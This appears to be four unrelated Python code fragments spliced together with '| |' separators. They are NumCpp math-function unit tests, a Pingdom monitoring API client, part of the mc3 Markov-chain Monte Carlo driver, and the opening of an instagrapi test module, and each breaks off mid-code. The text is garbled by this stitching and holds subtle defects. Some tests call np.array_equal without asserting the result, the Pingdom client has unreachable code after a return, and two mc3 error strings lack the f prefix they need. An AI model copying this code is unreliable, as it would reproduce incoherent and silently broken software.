cArray1.setArray(data1)
cArray2.setArray(data2)
assert np.array_equal(NumCpp.append(cArray1, cArray2, NumCpp.Axis.COL).getNumpyArray(),
np.append(data1, data2, axis=1))
####################################################################################
def test_arange():
start = np.random.randn(1).item()
stop = np.random.randn(1).item() * 100
step = np.abs(np.random.randn(1).item())
if stop < start:
step *= -1
data = np.arange(start, stop, step)
assert np.array_equal(np.round(NumCpp.arange(start, stop, step).flatten(), 9), np.round(data, 9))
####################################################################################
def test_arccos():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arccosScaler(value), 9) == np.round(np.arccos(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arccosScaler(value), 9) == np.round(np.arccos(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccosArray(cArray), 9), np.round(np.arccos(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccosArray(cArray), 9), np.round(np.arccos(data), 9))
####################################################################################
def test_arccosh():
value = np.abs(np.random.rand(1).item()) + 1
assert np.round(NumCpp.arccoshScaler(value), 9) == np.round(np.arccosh(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arccoshScaler(value), 9) == np.round(np.arccosh(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols) + 1
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccoshArray(cArray), 9), np.round(np.arccosh(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccoshArray(cArray), 9), np.round(np.arccosh(data), 9))
####################################################################################
def test_arcsin():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arcsinScaler(value), 9) == np.round(np.arcsin(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arcsinScaler(value), 9) == np.round(np.arcsin(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arcsinArray(cArray), 9), np.round(np.arcsin(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
np.array_equal(np.round(NumCpp.arcsinArray(cArray), 9), np.round(np.arcsin(data), 9))
####################################################################################
def test_arcsinh():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arcsinhScaler(value), 9) == np.round(np.arcsinh(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arcsinhScaler(value), 9) == np.round(np.arcsinh(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arcsinhArray(cArray), 9), np.round(np.arcsinh(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
np.array_equal(np.round(NumCpp.arcsinhArray(cArray), 9), np.round(np.arcsinh(data), 9))
####################################################################################
def test_arctan():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arctanScaler(value), 9) == np.round(np.arctan(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arctanScaler(value), 9) == np.round(np.arctan(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arctanArray(cArray), 9), np.round(np.arctan(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
np.array_equal(np.round(NumCpp.arctanArray(cArray), 9), np.round(np.arctan(data), 9))
####################################################################################
def test_arctan2():
xy = np.random.rand(2) * 2 - 1
assert np.round(NumCpp.arctan2Scaler(xy[1], xy[0]), 9) == np.round(np.arctan2(xy[1], xy[0]), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArrayX = NumCpp.NdArray(shape)
cArrayY = NumCpp.NdArray(shape)
xy = np.random.rand(*shapeInput, 2) * 2 - 1
xData = xy[:, :, 0].reshape(shapeInput)
yData = xy[:, :, 1].reshape(shapeInput)
cArrayX.setArray(xData)
cArrayY.setArray(yData)
assert np.array_equal(np.round(NumCpp.arctan2Array(cArrayY, cArrayX), 9), np.round(np.arctan2(yData, xData), 9))
####################################################################################
def test_arctanh():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arctanhScaler(value), 9) == np.round(np.arctanh(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arctanhScaler(value), 9) == np.round(np.arctanh(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arctanhArray(cArray), 9), np.round(np.arctanh(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
np.array_equal(np.round(NumCpp.arctanhArray(cArray), 9), np.round(np.arctanh(data), 9))
####################################################################################
def test_argmax():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.NONE).item(), np.argmax(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.NONE).item(), np.argmax(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.ROW).flatten(), np.argmax(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.ROW).flatten(), np.argmax(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.COL).flatten(), np.argmax(data, axis=1))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.COL).flatten(), np.argmax(data, axis=1))
####################################################################################
def test_argmin():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmin(cArray, NumCpp.Axis.NONE).item(), np.argmin(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmin(cArray, NumCpp.Axis.NONE).item(), np.argmin(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmin(cArray, NumCpp.Axis.ROW).flatten(), np.argmin(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert | |
import requests
import sys
from pingdomlib.check import PingdomCheck
from pingdomlib.contact import PingdomContact
from pingdomlib.reports import PingdomEmailReport, PingdomSharedReport
server_address = 'https://api.pingdom.com'
api_version = '2.0'
class Pingdom(object):
"""Main connection object to interact with pingdom
Attributes:
* pushChanges -- This boolean controls if changes are automatically
pushed to pingdom
* shortlimit -- String containing short api rate limit details
* longlimit -- String containing long api rate limit details
"""
def __init__(self, username, password, apikey, accountemail=None,
pushchanges=True, server=server_address):
self.pushChanges = pushchanges
self.username = username
self.password = password
self.apikey = apikey
self.accountemail = accountemail
self.url = '%s/api/%s/' % (server, api_version)
self.shortlimit = ''
self.longlimit = ''
@staticmethod
def _serializeBooleans(params):
""""Convert all booleans to lowercase strings"""
serialized = {}
for name, value in params.items():
if value is True:
value = 'true'
elif value is False:
value = 'false'
serialized[name] = value
return serialized
for k, v in params.items():
if isinstance(v, bool):
params[k] = str(v).lower()
def request(self, method, url, parameters=dict()):
"""Requests wrapper function"""
# The requests library uses urllib, which serializes to "True"/"False" while Pingdom requires lowercase
parameters = self._serializeBooleans(parameters)
headers = {'App-Key': self.apikey}
if self.accountemail:
headers.update({'Account-Email': self.accountemail})
# Method selection handling
if method.upper() == 'GET':
response = requests.get(self.url + url, params=parameters,
auth=(self.username, self.password),
headers=headers)
elif method.upper() == 'POST':
response = requests.post(self.url + url, data=parameters,
auth=(self.username, self.password),
headers=headers)
elif method.upper() == 'PUT':
response = requests.put(self.url + url, data=parameters,
auth=(self.username, self.password),
headers=headers)
elif method.upper() == 'DELETE':
response = requests.delete(self.url + url, params=parameters,
auth=(self.username, self.password),
headers=headers)
else:
raise Exception("Invalid method in pingdom request")
# Store pingdom api limits
self.shortlimit = response.headers.get(
'Req-Limit-Short',
self.shortlimit)
self.longlimit = response.headers.get(
'Req-Limit-Long',
self.longlimit)
# Verify OK response
if response.status_code != 200:
sys.stderr.write('ERROR from %s: %d' % (response.url,
response.status_code))
sys.stderr.write('Returned data: %s\n' % response.json())
response.raise_for_status()
return response
def actions(self, **parameters):
"""Returns a list of actions (alerts) that have been generated for
your account.
Optional Parameters:
* from -- Only include actions generated later than this timestamp.
Format is UNIX time.
Type: Integer
Default: None
* to -- Only include actions generated prior to this timestamp.
Format is UNIX time.
Type: Integer
Default: None
* limit -- Limits the number of returned results to the specified
quantity.
Type: Integer (max 300)
Default: 100
* offset -- Offset for listing.
Type: Integer
Default: 0
* checkids -- Comma-separated list of check identifiers. Limit
results to actions generated from these checks.
Type: String
Default: All
* contactids -- Comma-separated list of contact identifiers.
Limit results to actions sent to these contacts.
Type: String
Default: All
* status -- Comma-separated list of statuses. Limit results to
actions with these statuses.
Type: String ['sent', 'delivered', 'error',
'not_delivered', 'no_credits']
Default: All
* via -- Comma-separated list of via mediums. Limit results to
actions with these mediums.
Type: String ['email', 'sms', 'twitter', 'iphone',
'android']
Default: All
Returned structure:
{
'alerts' : [
{
'contactname' : <String> Name of alerted contact
'contactid' : <String> Identifier of alerted contact
'checkid' : <String> Identifier of check
'time' : <Integer> Time of alert generation. Format
UNIX time
'via' : <String> Alert medium ['email', 'sms',
'twitter', 'iphone',
'android']
'status' : <String> Alert status ['sent', 'delivered',
'error',
'notdelivered',
'nocredits']
'messageshort': <String> Short description of message
'messagefull' : <String> Full message body
'sentto' : <String> Target address, phone number, etc
'charged' : <Boolean> True if your account was charged
for this message
},
...
]
}
"""
# Warn user about unhandled parameters
for key in parameters:
if key not in ['from', 'to', 'limit', 'offset', 'checkids',
'contactids', 'status', 'via']:
sys.stderr.write('%s not a valid argument for actions()\n'
% key)
response = self.request('GET', 'actions', parameters)
return response.json()['actions']
def alerts(self, **parameters):
"""A short-hand version of 'actions', returns list of alerts.
See parameters for actions()"""
return self.actions(**parameters)['alerts']
def getChecks(self, **parameters):
"""Pulls all checks from pingdom
Optional Parameters:
* limit -- Limits the number of returned probes to the
specified quantity.
Type: Integer (max 25000)
Default: 25000
* offset -- Offset for listing (requires limit.)
Type: Integer
Default: 0
* tags -- Filter listing by tag/s
Type: String
Default: None
"""
# Warn user about unhandled parameters
for key in parameters:
if key not in ['limit', 'offset', 'tags']:
sys.stderr.write('%s not a valid argument for getChecks()\n'
% key)
response = self.request('GET', 'checks', parameters)
return [PingdomCheck(self, x) for x in response.json()['checks']]
def getCheck(self, checkid):
"""Returns a detailed description of a specified check."""
check = PingdomCheck(self, {'id': checkid})
check.getDetails()
return check
def getResults(self, checkid):
""" Returns detailed results for a specified check id."""
response = self.request('GET','results/%s' % checkid)
return response.json()
def newCheck(self, name, host, checktype='http', **kwargs):
"""Creates a new check with settings specified by provided parameters.
Provide new check name, hostname and type along with any additional
optional parameters passed as keywords. Returns new PingdomCheck
instance
Types available:
* http
* httpcustom
* tcp
* ping
* dns
* udp
* smtp
* pop3
Optional parameters:
* paused -- Check should be paused
Type: Boolean
Default: False
* resolution -- Check resolution time (in minutes)
Type: Integer [1, 5, 15, 30, 60]
Default: 5
* contactids -- Comma separated list of contact IDs
Type: String
Default: None
* sendtoemail -- Send alerts as email
Type: Boolean
Default: False
* sendtosms -- Send alerts as SMS
Type: Boolean
Default: False
* sendtotwitter -- Send alerts through Twitter
Type: Boolean
Default: False
* sendtoiphone -- Send alerts to iPhone
Type: Boolean
Default: False
* sendtoandroid -- Send alerts to Android
Type: Boolean
Default: False
* sendnotificationwhendown -- Send notification when check is down
the given number of times
Type: Integer
Default: 2
* notifyagainevery -- Set how many results to wait for in between
notices
Type: Integer
Default: 0
* notifywhenbackup -- Notify when back up again
Type: Boolean
Default: True
* use_legacy_notifications -- Use the old notifications instead of
BeepManager
Type: Boolean
Default: False
HTTP check options:
* url -- Target path on server
Type: String
Default: /
* encryption -- Use SSL/TLS
Type: Boolean
Default: False
* port -- Target server port
Type: Integer
Default: 80
* auth -- Username and password for HTTP authentication
Example: user:password
Type: String
Default: None
* shouldcontain -- Target site should contain this string.
Cannot be combined with 'shouldnotcontain'
Type: String
Default: None
* shouldnotcontain -- Target site should not contain this string.
Cannot be combined with 'shouldcontain'
Type: String
Default: None
* postdata -- Data that should be posted to the web page,
for example submission data for a sign-up or login form.
The data needs to be formatted in the same way as a web browser
would send it to the web server
Type: String
Default: None
* requestheader<NAME> -- Custom HTTP header, replace <NAME> with
desired header name. Header in form: Header:Value
Type: String
Default: None
HTTPCustom check options:
* url -- Target path on server
Type: String
Mandatory
* encryption -- Use SSL/TLS
Type: Boolean
Default: False
* port -- Target server port
Type: Integer
Default: 80
* auth -- Username and password for HTTP authentication
Example: user:password
Type: String
Default: None
* additionalurls -- Colon-separated list of additonal URLS with
hostname included
Type: String
Default: None
TCP check options:
* port -- Target server port
Type: Integer
Mandatory
* stringtosend -- String to send
Type: String
Default: None
* stringtoexpect -- String to expect in response
Type: String
Default: None
DNS check options:
* expectedip -- Expected IP
Type: String
Mandatory
* nameserver -- Nameserver to check
Type: String
Mandatory
UDP check options:
* port -- Target server port
Type: Integer
Mandatory
* stringtosend -- String to send
Type: String
Default: None
* stringtoexpect -- String to expect in response
Type: String
Default: None
SMTP check options:
* port -- Target server port
Type: Integer
Default: 25
* auth -- Username and password for target SMTP authentication.
Example: user:password
Type: String
Default: None
* stringtoexpect -- String to expect in response
Type: | |
closelog = True
else:
closelog = False
if log is None:
log = mu.Log()
log.msg(
f"\n{log.sep}\n"
" Multi-core Markov-chain Monte Carlo (mc3).\n"
f" Version {__version__}.\n"
f" Copyright (c) 2015-{date.today().year} <NAME> "
"and collaborators.\n"
" mc3 is open-source software under the MIT license (see LICENSE).\n"
f"{log.sep}\n\n")
if sampler is None:
log.error("'sampler' is a required argument.")
if nsamples is None and sampler in ['MRW', 'DEMC', 'snooker']:
log.error("'nsamples' is a required argument for MCMC runs.")
if leastsq not in [None, 'lm', 'trf']:
log.error(
f"Invalid 'leastsq' input ({leastsq}). Must select from "
"['lm', 'trf'].")
# Read the model parameters:
params = mu.isfile(params, 'params', log, 'ascii', False, not_none=True)
# Unpack if necessary:
if np.ndim(params) > 1:
ninfo, ndata = np.shape(params)
if ninfo == 7: # The priors
prior = params[4]
priorlow = params[5]
priorup = params[6]
if ninfo >= 4: # The stepsize
pstep = params[3]
if ninfo >= 3: # The boundaries
pmin = params[1]
pmax = params[2]
else:
log.error('Invalid format/shape for params input file.')
params = params[0] # The initial guess
params = np.array(params)
# Process data and uncertainties:
data = mu.isfile(data, 'data', log, 'bin', False, not_none=True)
if np.ndim(data) > 1:
data, uncert = data
# Make local 'uncert' a copy, to avoid overwriting:
if uncert is None:
log.error("'uncert' is a required argument.")
uncert = np.copy(uncert)
# Process the independent parameters:
if indparams != []:
indparams = mu.isfile(indparams, 'indparams', log, 'bin', unpack=False)
if ioff:
plt.ioff()
resume = resume and (savefile is not None)
if resume:
log.msg(f"\n\n{log.sep}\n{log.sep} Resuming previous MCMC run.\n\n")
# Import the model function:
if isinstance(func, (list, tuple, np.ndarray)):
if len(func) == 3:
sys.path.append(func[2])
else:
sys.path.append(os.getcwd())
fmodule = importlib.import_module(func[1])
func = getattr(fmodule, func[0])
elif not callable(func):
log.error(
"'func' must be either a callable or an iterable of strings "
"with the model function, file, and path names.")
if ncpu is None and sampler in ['snooker', 'demc', 'mrw']:
ncpu = nchains
elif ncpu is None and sampler == 'dynesty':
ncpu = 1
# Cap the number of processors:
if ncpu >= mpr.cpu_count():
log.warning(
f"The number of requested CPUs ({ncpu}) is >= than the number "
f"of available CPUs ({mpr.cpu_count()}). "
f"Enforced ncpu to {mpr.cpu_count()-1}.")
ncpu = mpr.cpu_count() - 1
nparams = len(params)
ndata = len(data)
# Setup array of parameter names:
if pnames is None and texnames is not None:
pnames = texnames
elif pnames is not None and texnames is None:
texnames = pnames
elif pnames is None and texnames is None:
pnames = texnames = mu.default_parnames(nparams)
pnames = np.asarray(pnames)
texnames = np.asarray(texnames)
if pmin is None:
pmin = np.tile(-np.inf, nparams)
if pmax is None:
pmax = np.tile( np.inf, nparams)
pmin = np.asarray(pmin)
pmax = np.asarray(pmax)
if (np.any(np.isinf(pmin)) or np.any(np.isinf(pmax))) \
and sampler=='dynesty':
log.error('Parameter space must be constrained by pmin and pmax.')
if pstep is None:
pstep = 0.1 * np.abs(params)
pstep = np.asarray(pstep)
# Set prior parameter indices:
if prior is None or priorup is None or priorlow is None:
prior = priorup = priorlow = np.zeros(nparams)
# Override priors for non-free parameters:
priorlow[pstep<=0] = 0.0
priorup [pstep<=0] = 0.0
# Check that initial values lie within the boundaries:
if np.any(params < pmin) or np.any(params > pmax):
pout = ""
for pname, par, minp, maxp in zip(pnames, params, pmin, pmax):
if par < minp:
pout += "\n{pname[:11]:11s} {minp: 12.5e} < {par: 12.5e}"
if par > maxp:
pout += "\n{pname[:11]:26s} {par: 12.5e} > {maxp: 12.5e}"
log.error(
"Some initial-guess values are out of bounds:\n"
"Param name pmin value pmax\n"
"----------- ------------ ------------ ------------"
f"{pout}")
nfree = int(np.sum(pstep > 0))
ifree = np.where(pstep > 0)[0] # Free parameter indices
ishare = np.where(pstep < 0)[0] # Shared parameter indices
# Check output dimension:
model0 = func(params, *indparams)
if np.shape(model0) != np.shape(data):
log.error(
f"The size of the data array ({np.size(data)}) does not "
f"match the size of the func() output ({np.size(model0)}).")
# Check that output path exists:
if savefile is not None:
fpath, fname = os.path.split(os.path.realpath(savefile))
if not os.path.exists(fpath):
log.warning(
f"Output folder path: '{fpath}' does not exist. "
"Creating new folder.")
os.makedirs(fpath)
# At the moment, skip optimization when these dynesty inputs exist:
if sampler == 'dynesty' \
and ('loglikelihood' in kwargs or 'prior_transform' in kwargs):
leastsq = None
# Least-squares minimization:
chisq_factor = 1.0
if leastsq is not None:
fit_output = fit(
data, uncert, func, np.copy(params), indparams,
pstep, pmin, pmax, prior, priorlow, priorup, leastsq)
fit_bestp = fit_output['bestp']
log.msg(
f"Least-squares best-fitting parameters:\n {fit_bestp}\n\n",
si=2)
# Scale data-uncertainties such that reduced chisq = 1:
if chisqscale:
chisq_factor = np.sqrt(fit_output['best_chisq']/(ndata-nfree))
uncert *= chisq_factor
# Re-calculate best-fitting parameters with new uncertainties:
fit_output = fit(
data, uncert, func, np.copy(params), indparams,
pstep, pmin, pmax, prior, priorlow, priorup, leastsq)
log.msg(
"Least-squares best-fitting parameters (rescaled chisq):"
f"\n {fit_output['bestp']}\n\n",
si=2)
params = np.copy(fit_output['bestp'])
else:
fit_output = None
if resume:
with np.load(savefile) as oldrun:
uncert *= float(oldrun['chisq_factor'])/chisq_factor
chisq_factor = float(oldrun['chisq_factor'])
# Here's where the magic happens:
if sampler in ['mrw', 'demc', 'snooker']:
output = mcmc(data, uncert, func, params, indparams, pmin, pmax, pstep,
prior, priorlow, priorup, nchains, ncpu, nsamples, sampler,
wlike, fit_output, grtest, grbreak, grnmin, burnin, thinning,
fgamma, fepsilon, hsize, kickoff, savefile, resume, log)
elif sampler == 'dynesty':
output = nested_sampling(data, uncert, func, params, indparams,
pmin, pmax, pstep, prior, priorlow, priorup, ncpu,
thinning, resume, log, **kwargs)
if leastsq is not None:
if (output['best_log_post'] - fit_output['best_log_post'] > 5.0e-8
and np.any((output['bestp'] - fit_output['bestp'])!=0.0)):
log.warning(
"MCMC found a better fit than the minimizer:\n"
"MCMC best-fitting parameters: (chisq={:.8g})\n{}\n"
"Minimizer best-fitting parameters: (chisq={:.8g})\n{}".
format(
-2*output['best_log_post'], output['bestp'],
-2*fit_output['best_log_post'], fit_output['bestp']))
else:
output['best_log_post'] = fit_output['best_log_post']
output['best_chisq'] = fit_output['best_chisq']
output['best_model'] = fit_output['best_model']
output['bestp'] = fit_output['bestp']
# And remove burn-in samples:
posterior, zchain, zmask = mu.burn(
Z=output['posterior'], zchain=output['zchain'], burnin=output['burnin'])
# Get some stats:
output['chisq_factor'] = chisq_factor
output['BIC'] = output['best_chisq'] + nfree*np.log(ndata)
if ndata > nfree:
output['red_chisq'] = output['best_chisq']/(ndata-nfree)
else:
output['red_chisq'] = np.nan
output['stddev_residuals'] = np.std(output['best_model']-data)
# Compute the credible region for each parameter:
bestp = output['bestp']
CRlo = np.zeros(nparams)
CRhi = np.zeros(nparams)
pdf = []
xpdf = []
for post, idx in zip(posterior.T, ifree):
PDF, Xpdf, HPDmin = ms.cred_region(post)
pdf.append(PDF)
xpdf.append(Xpdf)
CRlo[idx] = np.amin(Xpdf[PDF>HPDmin])
CRhi[idx] = np.amax(Xpdf[PDF>HPDmin])
# CR relative to the best-fitting value:
CRlo[ifree] -= bestp[ifree]
CRhi[ifree] -= bestp[ifree]
# Get the mean and standard deviation from the posterior:
meanp = np.zeros(nparams, np.double) # Parameters mean
stdp = np.zeros(nparams, np.double) # Parameter standard deviation
meanp[ifree] = np.mean(posterior, axis=0)
stdp [ifree] = np.std(posterior, axis=0)
for s in ishare:
bestp[s] = bestp[-int(pstep[s])-1]
meanp[s] = meanp[-int(pstep[s])-1]
stdp [s] = stdp [-int(pstep[s])-1]
CRlo [s] = CRlo [-int(pstep[s])-1]
CRhi [s] = CRhi [-int(pstep[s])-1]
output['CRlo'] = CRlo
output['CRhi'] = CRhi
output['stdp'] = stdp
output['meanp'] = meanp
output['ifree'] = ifree
output['pnames'] = pnames
output['texnames'] = texnames
log.msg(
"\nParam name Best fit Lo HPD CR Hi HPD CR Mean Std dev S/N"
"\n----------- ----------------------------------- ---------------------- ---------",
width=80)
for i in range(nparams):
snr = f"{np.abs(bestp[i])/stdp[i]:.1f}"
mean = f"{meanp[i]: 11.4e}"
lo = f"{CRlo[i]: 11.4e}"
hi = f"{CRhi[i]: 11.4e}"
if i in ifree: # Free-fitting value
pass
elif i in ishare: # Shared value
snr = f"[share{-int(pstep[i]):02d}]"
else: # Fixed value
snr = "[fixed]"
mean = f"{bestp[i]: 11.4e}"
log.msg(
f"{pnames[i][0:11]:<11s} {bestp[i]:11.4e} {lo:>11s} {hi:>11s} "
f"{mean:>11s} {stdp[i]:10.4e} {snr:>9s}",
width=160)
fmt = len(f"{output['BIC']:.4f}") # Length of string formatting
log.msg(" ")
if chisqscale:
log.msg(
"sqrt(reduced chi-squared) factor: {:{}.4f}".
format(output['chisq_factor'], fmt), indent=2)
log.msg("Best-parameter's chi-squared: {:{}.4f}".
format(output['best_chisq'], fmt), indent=2)
log.msg("Best-parameter's -2*log(posterior): {:{}.4f}".
format(-2*output['best_log_post'], fmt), indent=2)
log.msg("Bayesian Information Criterion: {:{}.4f}".
format(output['BIC'], fmt), indent=2)
log.msg("Reduced chi-squared: {:{}.4f}".
format(output['red_chisq'], fmt), indent=2)
log.msg("Standard deviation of residuals: {:.6g}\n".
format(output['stddev_residuals']), indent=2)
if savefile is not None or plots or closelog:
log.msg("\nOutput sampler files:")
# Save results (pop unpickables before saving, then put back):
if savefile is not None:
unpickables = ['dynesty_sampler']
unpickables = np.intersect1d(unpickables, list(output.keys()))
tmp_outputs = {key: output.pop(key) for key in unpickables}
np.savez(savefile, **output)
output.update(tmp_outputs)
log.msg(f"'{savefile}'", indent=2)
if plots:
# Extract filename from savefile or default to sampler:
fname = sampler if savefile is None else os.path.splitext(savefile)[0]
# Include bestp in posterior plots:
best_freepars = output['bestp'][ifree] | |
import json
import os
import os.path
import random
import unittest
from datetime import datetime
from json.decoder import JSONDecodeError
from pathlib import Path
from instagrapi import Client
from instagrapi.story import StoryBuilder
from instagrapi.types import (
Account,
Collection,
Comment,
DirectMessage,
DirectThread,
Hashtag,
Location,
Media,
MediaOembed,
Story,
StoryLink,
StoryLocation,
StoryMention,
StoryHashtag,
StorySticker,
User,
UserShort,
Usertag
)
from instagrapi.zones import UTC
from instagrapi.utils import generate_jazoest
ACCOUNT_USERNAME = os.environ.get("IG_USERNAME", "instagrapi2")
ACCOUNT_PASSWORD = os.environ.get("IG_PASSWORD", "<PASSWORD>")
ACCOUNT_SESSIONID = os.environ.get("IG_SESSIONID", "")
REQUIRED_MEDIA_FIELDS = [
"pk", "taken_at", "id", "media_type", "code", "thumbnail_url", "location",
"user", "comment_count", "like_count", "caption_text", "usertags",
"video_url", "view_count", "video_duration", "title"
]
REQUIRED_STORY_FIELDS = [
'pk', 'id', 'code', 'taken_at', 'media_type', 'product_type',
'thumbnail_url', 'user', 'video_url', 'video_duration', 'mentions',
'links'
]
def cleanup(*paths):
for path in paths:
try:
os.remove(path)
os.remove(f'{path}.jpg')
except FileNotFoundError:
continue
class BaseClientMixin:
def __init__(self, *args, **kwargs):
if self.api is None:
self.api = Client()
self.set_proxy_if_exists()
super().__init__(*args, **kwargs)
def set_proxy_if_exists(self):
proxy = os.environ.get("IG_PROXY", "")
if proxy:
self.api.set_proxy(proxy) # "socks5://127.0.0.1:30235"
return True
class FakeClientTestCase(BaseClientMixin, unittest.TestCase):
api = None
def test_login(self):
try:
